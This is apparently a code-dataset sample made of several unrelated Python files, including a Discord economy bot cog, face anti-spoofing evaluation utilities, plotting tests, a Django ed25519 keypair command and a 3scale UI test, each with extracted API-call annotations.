[((198, 262), 'cryptol.connect', 'cryptol.connect', (['"""cabal new-exec --verbose=0 cryptol-remote-api"""'], {}), "('cabal new-exec --verbose=0 cryptol-remote-api')\n", (213, 262), False, 'import cryptol\n'), ((652, 688), 'cryptol.add_cryptol_module', 'cryptol.add_cryptol_module', (['"""Foo"""', 'c'], {}), "('Foo', c)\n", (678, 688), False, 'import cryptol\n'), ((165, 191), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (181, 191), False, 'import os\n')]
|
from asyncpg import Connection
from discord import Embed, User
from discord.utils import utcnow
from discord.ext import commands
from bot import GrowContext, GrowTube, MessagedError
from growconomy.constants import currency_name, embed_color, currency_emoji
from growconomy.views import ConfirmView
class Career(commands.Cog):
def __init__(self, bot: GrowTube) -> None:
self.bot = bot
async def cog_check(self, ctx: GrowContext):
data = await self.bot.pool.fetchval(
"SELECT 1 FROM users WHERE id = $1", ctx.author.id
)
if data is None:
raise MessagedError("You're not registered")
return True
@commands.group(invoke_without_command=True)
async def career(self, ctx: GrowContext):
await ctx.send_help(ctx.command)
@career.command(name="list")
async def _list(self, ctx: GrowContext):
careers = await self.bot.pool.fetch(
"SELECT careers.id, careers.name, COUNT(positions.id) AS positions FROM careers JOIN positions ON careers.id = positions.career GROUP BY careers.id"
)
embed = Embed(
title="List of careers",
description="\n".join(
f"**{i[1]}** with **{i[2]}** positions, id: {i[0]}" for i in careers
),
color=embed_color,
)
return await ctx.reply(embed=embed)
@career.command()
async def info(self, ctx: GrowContext, user: User = None):
user = user or ctx.author
c_name, pos_name, pos_pay = (
await self.bot.pool.fetchrow(
"SELECT careers.name, positions.name, positions.pay FROM users JOIN careers ON careers.id = users.career JOIN positions ON positions.id = users.position WHERE users.id = $1",
ctx.author.id,
)
) or [None, None, None]
if c_name is None:
raise MessagedError(
f"{f'`{user.display_name}`' if user != ctx.author else 'You'} seems to be unemployed"
)
await ctx.send(
embed=Embed(
timestamp=utcnow(),
color=embed_color,
)
.set_author(name=user.display_name, icon_url=user.display_avatar)
.add_field(name="Job name", value=c_name)
.add_field(name="Position", value=pos_name)
.add_field(
                name="Wage", value=f"{pos_pay:,} {currency_name} {currency_emoji}"
)
)
@career.command()
async def change(self, ctx: GrowContext, career_id: int):
async with self.bot.pool.acquire() as conn:
oc_name, op_id, op_pay = (
await conn.fetchrow(
"SELECT careers.name, positions.name, positions.pay FROM users JOIN positions ON positions.id = users.position JOIN careers ON careers.id = users.career WHERE users.id = $1",
ctx.author.id,
)
) or [None, None, None]
conn: Connection
if career_id == 0:
if oc_name is None:
return await ctx.reply("You're already unemployed dummy")
view = ConfirmView(ctx, timeout=60, delete_after=None)
await view.prompt("Are you sure you want to quit your job?")
if not view.result:
return await view.message.reply("aborting")
await self.bot.pool.execute(
"UPDATE users SET career = NULL, position = NULL WHERE id = $1",
ctx.author.id,
)
return await ctx.send(
"Congratulations, you're now unemployed. Have fun eating pizza 24/7"
)
pos_id, pos_name, c_name, pos_pay = (
await conn.fetchrow(
"SELECT positions.id, positions.name, careers.name, positions.pay FROM positions JOIN careers ON careers.id = positions.career WHERE privilege = (SELECT MAX(privilege) FROM positions) AND careers.id = $1 ORDER BY RANDOM() LIMIT 1",
career_id,
)
) or [None, None, None, None]
if pos_id is None:
raise MessagedError("Invalid career id")
view = ConfirmView(ctx, timeout=60, delete_after=None)
if oc_name:
text = (
"Are you sure you want to repick your job?\n"
f"You're currently working as a **{oc_name}**, with **{op_id}** position and with a pay of **{op_pay:,} {currency_name}**\n"
f"Changing to **{c_name}**, with **{pos_name}** positions and a pay of **{pos_pay:,} {currency_name}** {currency_emoji}"
)
else:
text = f"Are you sure you want to be a **{c_name}** as **{pos_name}** with a pay of **{pos_pay:,} {currency_name}** {currency_emoji} (You can change career anytime)"
await view.prompt(text)
if not view.result:
return await view.message.reply("aborting")
await self.bot.pool.execute(
"UPDATE users SET career = $1, position = $2 WHERE id = $3",
career_id,
pos_id,
ctx.author.id,
)
await ctx.send(f"Changed your career to **{c_name}** as a **{pos_name}**")
|
[
"discord.utils.utcnow",
"growconomy.views.ConfirmView",
"bot.MessagedError",
"discord.ext.commands.group"
] |
[((675, 718), 'discord.ext.commands.group', 'commands.group', ([], {'invoke_without_command': '(True)'}), '(invoke_without_command=True)\n', (689, 718), False, 'from discord.ext import commands\n'), ((610, 648), 'bot.MessagedError', 'MessagedError', (['"""You\'re not registered"""'], {}), '("You\'re not registered")\n', (623, 648), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((1894, 2004), 'bot.MessagedError', 'MessagedError', (['f"""{f\'`{user.display_name}`\' if user != ctx.author else \'You\'} seems to be unemployed"""'], {}), '(\n f"{f\'`{user.display_name}`\' if user != ctx.author else \'You\'} seems to be unemployed"\n )\n', (1907, 2004), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((4266, 4313), 'growconomy.views.ConfirmView', 'ConfirmView', (['ctx'], {'timeout': '(60)', 'delete_after': 'None'}), '(ctx, timeout=60, delete_after=None)\n', (4277, 4313), False, 'from growconomy.views import ConfirmView\n'), ((3173, 3220), 'growconomy.views.ConfirmView', 'ConfirmView', (['ctx'], {'timeout': '(60)', 'delete_after': 'None'}), '(ctx, timeout=60, delete_after=None)\n', (3184, 3220), False, 'from growconomy.views import ConfirmView\n'), ((4211, 4245), 'bot.MessagedError', 'MessagedError', (['"""Invalid career id"""'], {}), "('Invalid career id')\n", (4224, 4245), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((2100, 2108), 'discord.utils.utcnow', 'utcnow', ([], {}), '()\n', (2106, 2108), False, 'from discord.utils import utcnow\n')]
|
'''
Code of 'Searching Central Difference Convolutional Networks for Face Anti-Spoofing'
By <NAME> & <NAME>, 2019
If you use the code, please cite:
@inproceedings{yu2020searching,
title={Searching Central Difference Convolutional Networks for Face Anti-Spoofing},
author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
booktitle= {CVPR},
year = {2020}
}
Only for research purpose, and commercial use is not allowed.
MIT License
Copyright (c) 2020
'''
import os
import numpy as np
import torch
import shutil
import torchvision.transforms as transforms
from torch.autograd import Variable
import sklearn
from sklearn import metrics
from sklearn.metrics import roc_curve, auc
import pdb
def get_file_list(read_path):
'''
    Get the paths of all image files under the given folder
:param read_path:
:return:
'''
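    # Note: this walks the directory tree by hand, descending up to three
    # nested folder levels and collecting every file path it finds
    # (os.walk would handle arbitrary depth; the fixed-depth loops below
    # presumably match how the dataset folders are laid out).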
path = read_path
dirs = os.listdir(path)
floder_len = len(dirs)
file_name_list = []
for i in range(floder_len):
        # build the path for this entry
floder = dirs[i]
floder_path = path + "/" + floder
        # if this entry is itself a directory, list it again and descend
if os.path.isdir(floder_path):
file_one = os.listdir(floder_path)
file_len_one = len(file_one)
for j in range(file_len_one):
                # read the videos
floder_path_one = floder_path + "/" + file_one[j]
if os.path.isdir(floder_path_one):
file_two = os.listdir(floder_path_one)
file_len_two = len(file_two)
for k in range(file_len_two):
floder_path_two = floder_path_one + "/" + file_two[k]
if os.path.isdir(floder_path_two):
file_three = os.listdir(floder_path_two)
file_len_three = len(file_three)
for m in range(file_len_three):
floder_path_three = floder_path_two + "/" + file_three[m]
file_name_list.append(floder_path_three)
else:
file_name_list.append(floder_path_two)
else:
file_name_list.append(floder_path_one)
        # otherwise the entry is a plain file, so add it directly
else:
file_name_list.append(floder_path)
return file_name_list
class AvgrageMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.avg = 0
self.sum = 0
self.cnt = 0
def update(self, val, n=1):
self.sum += val * n
self.cnt += n
self.avg = self.sum / self.cnt
def accuracy(output, target, topk=(1,)):
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def get_threshold(score_file):
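    # Every observed map_score is tried as a candidate threshold; samples with
    # score <= threshold are treated as rejected (fake).  APCER is the fraction
    # of fake samples that slip through (score > threshold), BPCER the fraction
    # of real samples rejected (score <= threshold), and the threshold that
    # minimizes ACER = (APCER + BPCER) / 2 is returned with its error rates.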
with open(score_file, 'r') as file:
lines = file.readlines()
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
angle = float(tokens[0])
# pdb.set_trace()
type = int(tokens[1])
data.append({'map_score': angle, 'label': type})
if type == 1:
num_real += 1
else:
num_fake += 1
    min_error = count    # tracks the minimum ACER (or ACC); initialised to an upper bound
min_threshold = 0.0
min_ACC = 0.0
min_ACER = 0.0
min_APCER = 0.0
min_BPCER = 0.0
for d in data:
threshold = d['map_score']
type1 = len([s for s in data if s['map_score'] <= threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > threshold and s['label'] == 0])
ACC = 1 - (type1 + type2) / count
APCER = type2 / num_fake
BPCER = type1 / num_real
ACER = (APCER + BPCER) / 2.0
if ACER < min_error:
min_error = ACER
min_threshold = threshold
min_ACC = ACC
min_ACER = ACER
min_APCER = APCER
            min_BPCER = BPCER
# print(min_error, min_threshold)
return min_threshold, min_ACC, min_APCER, min_BPCER, min_ACER
def test_threshold_based(threshold, score_file):
with open(score_file, 'r') as file:
lines = file.readlines()
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
angle = float(tokens[0])
type = int(tokens[1])
data.append({'map_score': angle, 'label': type})
if type == 1:
num_real += 1
else:
num_fake += 1
type1 = len([s for s in data if s['map_score'] <= threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > threshold and s['label'] == 0])
ACC = 1 - (type1 + type2) / count
APCER = type2 / num_fake
BPCER = type1 / num_real
ACER = (APCER + BPCER) / 2.0
return ACC, APCER, BPCER, ACER
def get_err_threhold(fpr, tpr, threshold):
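    # Equal-error-rate style threshold selection: the ROC index where
    # tpr + fpr is closest to 1 (i.e. FPR ~= FNR) is picked, and the FPR at
    # that point is returned as the error together with the matching
    # threshold.  The Youden-index candidate computed first is immediately
    # overwritten by this second criterion.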
    RightIndex = (tpr + (1 - fpr) - 1)
right_index = np.argmax(RightIndex)
best_th = threshold[right_index]
err = fpr[right_index]
differ_tpr_fpr_1 = tpr + fpr - 1.0
right_index = np.argmin(np.abs(differ_tpr_fpr_1))
best_th = threshold[right_index]
err = fpr[right_index]
# print(err, best_th)
return err, best_th
# def performances(dev_scores, dev_labels, test_scores, test_labels):
def performances(map_score_test_filename):
val_threshold = 0.4
# test
with open(map_score_test_filename, 'r') as file2:
lines = file2.readlines()
test_scores = []
test_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
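        # One leading and one trailing character are stripped from each token
        # before parsing, presumably to drop the wrapping characters left over
        # from how the map scores were serialised; the SiW/SiWM variants below
        # parse plain numbers instead.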
score = tokens[0]
score = score[:-1]
score = score[1:]
score = float(score)
label = tokens[1]
label = label[:-1]
label = label[1:]
label = int(label)
test_scores.append(score)
test_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
# test based on val_threshold
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
test_ACC = 1 - (type1 + type2) / count
test_APCER = type2 / num_fake
test_BPCER = type1 / num_real
test_ACER = (test_APCER + test_BPCER) / 2.0
# test based on test_threshold
fpr_test, tpr_test, threshold_test = roc_curve(test_labels, test_scores, pos_label=1)
err_test, best_test_threshold = get_err_threhold(fpr_test, tpr_test, threshold_test)
type1 = len([s for s in data if s['map_score'] <= best_test_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > best_test_threshold and s['label'] == 0])
test_threshold_ACC = 1 - (type1 + type2) / count
test_threshold_APCER = type2 / num_fake
test_threshold_BPCER = type1 / num_real
test_threshold_ACER = (test_threshold_APCER + test_threshold_BPCER) / 2.0
return test_ACC, test_APCER, test_BPCER, test_ACER, test_threshold_ACER
def performances_SiW_EER(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold = get_err_threhold(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
val_APCER = type2 / num_fake
val_BPCER = type1 / num_real
val_ACER = (val_APCER + val_BPCER) / 2.0
return val_threshold, val_ACC, val_APCER, val_BPCER, val_ACER
def performances_SiWM_EER(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold = get_err_threhold(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
val_APCER = type2 / num_fake
val_BPCER = type1 / num_real
val_ACER = (val_APCER + val_BPCER) / 2.0
return val_threshold, val_err, val_ACC, val_APCER, val_BPCER, val_ACER
def get_err_threhold_CASIA_Replay(fpr, tpr, threshold):
    RightIndex = (tpr + (1 - fpr) - 1)
right_index = np.argmax(RightIndex)
best_th = threshold[right_index]
err = fpr[right_index]
differ_tpr_fpr_1 = tpr + fpr - 1.0
right_index = np.argmin(np.abs(differ_tpr_fpr_1))
best_th = threshold[right_index]
err = fpr[right_index]
# print(err, best_th)
return err, best_th, right_index
def performances_CASIA_Replay(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = tokens[0]
score = score[:-1]
score = score[1:]
score = float(score)
label = tokens[1]
label = label[:-1]
label = label[1:]
label = int(label)
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold, right_index = get_err_threhold_CASIA_Replay(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
FRR = 1 - tpr # FRR = 1 - TPR
    HTER = (fpr + FRR) / 2.0    # half total error rate: mean of the false acceptance (fpr) and false rejection (FRR) rates
return val_ACC, fpr[right_index], FRR[right_index], HTER[right_index]
def performances_ZeroShot(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
auc_val = metrics.auc(fpr, tpr)
val_err, val_threshold, right_index = get_err_threhold_CASIA_Replay(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
FRR = 1 - tpr # FRR = 1 - TPR
    HTER = (fpr + FRR) / 2.0    # half total error rate: mean of the false acceptance (fpr) and false rejection (FRR) rates
return val_ACC, auc_val, HTER[right_index]
def count_parameters_in_MB(model):
return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if "auxiliary" not in name) / 1e6
def save_checkpoint(state, is_best, save):
filename = os.path.join(save, 'checkpoint.pth.tar')
torch.save(state, filename)
if is_best:
best_filename = os.path.join(save, 'model_best.pth.tar')
shutil.copyfile(filename, best_filename)
def save(model, model_path):
torch.save(model.state_dict(), model_path)
def load(model, model_path):
model.load_state_dict(torch.load(model_path))
def drop_path(x, drop_prob):
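    # Stochastic-depth style path dropping: with probability drop_prob a
    # sample's activations are zeroed via the per-sample Bernoulli mask, and
    # surviving samples are scaled by 1/keep_prob so the expected value is
    # unchanged.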
if drop_prob > 0.:
keep_prob = 1. - drop_prob
mask = Variable(torch.cuda.FloatTensor(x.size(0), 1, 1, 1, 1).bernoulli_(keep_prob))
x.div_(keep_prob)
x.mul_(mask)
return x
def create_exp_dir(path, scripts_to_save=None):
if not os.path.exists(path):
os.mkdir(path)
print('Experiment dir : {}'.format(path))
if scripts_to_save is not None:
os.mkdir(os.path.join(path, 'scripts'))
for script in scripts_to_save:
dst_file = os.path.join(path, 'scripts', os.path.basename(script))
shutil.copyfile(script, dst_file)
|
[
"os.mkdir",
"numpy.abs",
"sklearn.metrics.roc_curve",
"numpy.argmax",
"os.path.isdir",
"os.path.basename",
"torch.load",
"os.path.exists",
"torch.save",
"sklearn.metrics.auc",
"shutil.copyfile",
"os.path.join",
"os.listdir"
] |
[((876, 892), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (886, 892), False, 'import os\n'), ((5255, 5276), 'numpy.argmax', 'np.argmax', (['RightIndex'], {}), '(RightIndex)\n', (5264, 5276), True, 'import numpy as np\n'), ((6862, 6910), 'sklearn.metrics.roc_curve', 'roc_curve', (['test_labels', 'test_scores'], {'pos_label': '(1)'}), '(test_labels, test_scores, pos_label=1)\n', (6871, 6910), False, 'from sklearn.metrics import roc_curve, auc\n'), ((8120, 8166), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (8129, 8166), False, 'from sklearn.metrics import roc_curve, auc\n'), ((9267, 9313), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (9276, 9313), False, 'from sklearn.metrics import roc_curve, auc\n'), ((9907, 9928), 'numpy.argmax', 'np.argmax', (['RightIndex'], {}), '(RightIndex)\n', (9916, 9928), True, 'import numpy as np\n'), ((11002, 11048), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (11011, 11048), False, 'from sklearn.metrics import roc_curve, auc\n'), ((12191, 12237), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (12200, 12237), False, 'from sklearn.metrics import roc_curve, auc\n'), ((12252, 12273), 'sklearn.metrics.auc', 'metrics.auc', (['fpr', 'tpr'], {}), '(fpr, tpr)\n', (12263, 12273), False, 'from sklearn import metrics\n'), ((12965, 13005), 'os.path.join', 'os.path.join', (['save', '"""checkpoint.pth.tar"""'], {}), "(save, 'checkpoint.pth.tar')\n", (12977, 13005), False, 'import os\n'), ((13010, 13037), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (13020, 13037), False, 'import torch\n'), ((1098, 1124), 'os.path.isdir', 'os.path.isdir', (['floder_path'], {}), '(floder_path)\n', (1111, 1124), False, 'import os\n'), ((5410, 5434), 'numpy.abs', 'np.abs', (['differ_tpr_fpr_1'], {}), '(differ_tpr_fpr_1)\n', (5416, 5434), True, 'import numpy as np\n'), ((10062, 10086), 'numpy.abs', 'np.abs', (['differ_tpr_fpr_1'], {}), '(differ_tpr_fpr_1)\n', (10068, 10086), True, 'import numpy as np\n'), ((13078, 13118), 'os.path.join', 'os.path.join', (['save', '"""model_best.pth.tar"""'], {}), "(save, 'model_best.pth.tar')\n", (13090, 13118), False, 'import os\n'), ((13127, 13167), 'shutil.copyfile', 'shutil.copyfile', (['filename', 'best_filename'], {}), '(filename, best_filename)\n', (13142, 13167), False, 'import shutil\n'), ((13303, 13325), 'torch.load', 'torch.load', (['model_path'], {}), '(model_path)\n', (13313, 13325), False, 'import torch\n'), ((13630, 13650), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (13644, 13650), False, 'import os\n'), ((13660, 13674), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (13668, 13674), False, 'import os\n'), ((1149, 1172), 'os.listdir', 'os.listdir', (['floder_path'], {}), '(floder_path)\n', (1159, 1172), False, 'import os\n'), ((13775, 13804), 'os.path.join', 'os.path.join', (['path', '"""scripts"""'], {}), "(path, 'scripts')\n", (13787, 13804), False, 'import os\n'), ((13936, 13969), 'shutil.copyfile', 'shutil.copyfile', (['script', 'dst_file'], {}), '(script, dst_file)\n', (13951, 13969), False, 'import shutil\n'), ((1364, 1394), 'os.path.isdir', 'os.path.isdir', (['floder_path_one'], {}), 
'(floder_path_one)\n', (1377, 1394), False, 'import os\n'), ((13898, 13922), 'os.path.basename', 'os.path.basename', (['script'], {}), '(script)\n', (13914, 13922), False, 'import os\n'), ((1427, 1454), 'os.listdir', 'os.listdir', (['floder_path_one'], {}), '(floder_path_one)\n', (1437, 1454), False, 'import os\n'), ((1659, 1689), 'os.path.isdir', 'os.path.isdir', (['floder_path_two'], {}), '(floder_path_two)\n', (1672, 1689), False, 'import os\n'), ((1732, 1759), 'os.listdir', 'os.listdir', (['floder_path_two'], {}), '(floder_path_two)\n', (1742, 1759), False, 'import os\n')]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
*t4mon* - T4 monitoring **test functions** for gen_plot.py
"""
from __future__ import absolute_import
import six
import pandas as pd
from t4mon import df_tools, gen_plot
from matplotlib import pyplot as plt
from .base import TEST_DATAFRAME, BaseTestClass
class TestGenPlot(BaseTestClass):
""" Test functions for gen_plot.py """
def test_tobase64(self):
""" Test function for to_base64 """
plot_fig = TEST_DATAFRAME.plot()
self.assertIsInstance(gen_plot.to_base64(plot_fig), six.binary_type)
self.assertTrue(gen_plot.to_base64(plot_fig).
startswith(six.b('data:image/png;base64,')))
# Converting an empty plot, should return an empty string
self.assertEqual(gen_plot.to_base64(plt.figure().gca()), '')
def test_plotvar(self):
""" Test function for plot_var """
dataframe = df_tools.consolidate_data(self.test_data, system='SYSTEM1')
# make a plot filtering by system, uses dataframe.plot()
myplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
system='SYSTEM1',
logger=self.logger)
self.assertTrue(myplot.has_data())
self.assertTrue(myplot.is_figure_set())
# make a plot without filters, uses matplotlib.pyplot.plot()
myplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
logger=self.logger)
self.assertTrue(myplot.has_data())
self.assertTrue(myplot.is_figure_set())
# Selecting a non existing system should return an empty plot
voidplot = gen_plot.plot_var(dataframe,
'FRONTEND_11_OUTPUT_OK',
system='SYSTEM2',
logger=self.logger)
self.assertFalse(voidplot.has_data())
# now with an empty dataframe, should return None
voidplot = gen_plot.plot_var(pd.DataFrame(),
'DONTCARE',
logger=self.logger)
self.assertFalse(voidplot.has_data())
# same when trying to plot a non-existing variable
voidplot = gen_plot.plot_var(dataframe,
'DONTCARE',
logger=self.logger)
self.assertFalse(voidplot.has_data())
|
[
"t4mon.gen_plot.to_base64",
"pandas.DataFrame",
"t4mon.gen_plot.plot_var",
"matplotlib.pyplot.figure",
"t4mon.df_tools.consolidate_data",
"six.b"
] |
[((931, 990), 't4mon.df_tools.consolidate_data', 'df_tools.consolidate_data', (['self.test_data'], {'system': '"""SYSTEM1"""'}), "(self.test_data, system='SYSTEM1')\n", (956, 990), False, 'from t4mon import df_tools, gen_plot\n'), ((1073, 1168), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'system': '"""SYSTEM1"""', 'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', system='SYSTEM1',\n logger=self.logger)\n", (1090, 1168), False, 'from t4mon import df_tools, gen_plot\n'), ((1448, 1521), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', logger=self.logger)\n", (1465, 1521), False, 'from t4mon import df_tools, gen_plot\n'), ((1773, 1868), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""FRONTEND_11_OUTPUT_OK"""'], {'system': '"""SYSTEM2"""', 'logger': 'self.logger'}), "(dataframe, 'FRONTEND_11_OUTPUT_OK', system='SYSTEM2',\n logger=self.logger)\n", (1790, 1868), False, 'from t4mon import df_tools, gen_plot\n'), ((2365, 2425), 't4mon.gen_plot.plot_var', 'gen_plot.plot_var', (['dataframe', '"""DONTCARE"""'], {'logger': 'self.logger'}), "(dataframe, 'DONTCARE', logger=self.logger)\n", (2382, 2425), False, 'from t4mon import df_tools, gen_plot\n'), ((534, 562), 't4mon.gen_plot.to_base64', 'gen_plot.to_base64', (['plot_fig'], {}), '(plot_fig)\n', (552, 562), False, 'from t4mon import df_tools, gen_plot\n'), ((2118, 2132), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2130, 2132), True, 'import pandas as pd\n'), ((670, 701), 'six.b', 'six.b', (['"""data:image/png;base64,"""'], {}), "('data:image/png;base64,')\n", (675, 701), False, 'import six\n'), ((605, 633), 't4mon.gen_plot.to_base64', 'gen_plot.to_base64', (['plot_fig'], {}), '(plot_fig)\n', (623, 633), False, 'from t4mon import df_tools, gen_plot\n'), ((814, 826), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (824, 826), True, 'from matplotlib import pyplot as plt\n')]
|
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.db import IntegrityError
from base64 import b64encode
import ed25519
import sys
class Command(BaseCommand):
help = 'Manage Drawpile External Authentication'
#def add_arguments(self, parser):
#parser.add_argument('action', type=str)
def handle(self, *args, **kwargs):
self.make_keypair()
#if kwargs['action'] == 'make_keypair':
# self.make_keypair()
#else:
# raise CommandError("Unsupported action")
def make_keypair(self):
priv, pub = ed25519.create_keypair()
print (r"""# Ext auth key pair. Place this in local_settings.py
DRAWPILE_EXT_AUTH = {{
'PRIVATE_KEY': b64decode({priv}),
'PUBLIC_KEY': {pub},
}}""".format(
priv=b64encode(priv.to_bytes()),
pub=b64encode(pub.to_bytes())
))
|
[
"ed25519.create_keypair"
] |
[((632, 656), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (654, 656), False, 'import ed25519\n')]
|
"""Test for field definitions issue"""
# pylint: disable=unused-argument
import pytest
from widgetastic.widget import TextInput
from testsuite.ui.views.admin.audience.account_user import AccountUserEditView, AccountUserDetailView
from testsuite.ui.views.admin.audience.fields_definitions import FieldsDefinitionsCreateView
@pytest.fixture
def fields_definitions(login, navigator, threescale):
"""Create custom field definition"""
page = navigator.navigate(FieldsDefinitionsCreateView)
page.create_definition("custom_field", "Contact Name")
definition = [x for x in threescale.fields_definitions.list() if x["name"] == "custom_field"][0]
yield definition
threescale.fields_definitions.delete(definition.entity_id)
@pytest.mark.xfail
@pytest.mark.disruptive
@pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-7955")
def test_field_definitions(fields_definitions, account, navigator, browser):
"""
Preparation:
- Create custom field definition
Test:
- navigate to AccountUserEditView
- edit custom field
- navigate to AccountUserDetailView
- assert that custom field is displayed and correctly edited
"""
user = account.users.list()[0]
user_edit = navigator.navigate(AccountUserEditView, account=account, user=user)
field = TextInput(browser, id='user_extra_fields_custom_field')
field.fill('anything')
user_edit.update_button.click()
navigator.navigate(AccountUserDetailView, account=account, user=user)
assert browser.element(".//th[contains(text(),'Contact Name')]").is_displayed()
assert browser.element(".//td[contains(text(),'anything')]").is_displayed()
|
[
"pytest.mark.issue",
"widgetastic.widget.TextInput"
] |
[((786, 855), 'pytest.mark.issue', 'pytest.mark.issue', (['"""https://issues.redhat.com/browse/THREESCALE-7955"""'], {}), "('https://issues.redhat.com/browse/THREESCALE-7955')\n", (803, 855), False, 'import pytest\n'), ((1331, 1386), 'widgetastic.widget.TextInput', 'TextInput', (['browser'], {'id': '"""user_extra_fields_custom_field"""'}), "(browser, id='user_extra_fields_custom_field')\n", (1340, 1386), False, 'from widgetastic.widget import TextInput\n')]
|
#!/usr/bin/env python
from main import setup_logging
from flotilla.cli import cli
if __name__ == '__main__':
setup_logging()
cli()
|
[
"flotilla.cli.cli",
"main.setup_logging"
] |
[((115, 130), 'main.setup_logging', 'setup_logging', ([], {}), '()\n', (128, 130), False, 'from main import setup_logging\n'), ((135, 140), 'flotilla.cli.cli', 'cli', ([], {}), '()\n', (138, 140), False, 'from flotilla.cli import cli\n')]
|
import global_vars
import os
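# A*-style evaluation function: f(board) = manhattan_distance(board) (the
# heuristic h) + distance_from_start(board, pred) (the path cost g, recovered
# by walking the predecessor map back to the start state).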
def heuristic_value(board,pred):
return manhattan_distance(board) + distance_from_start(board,pred)
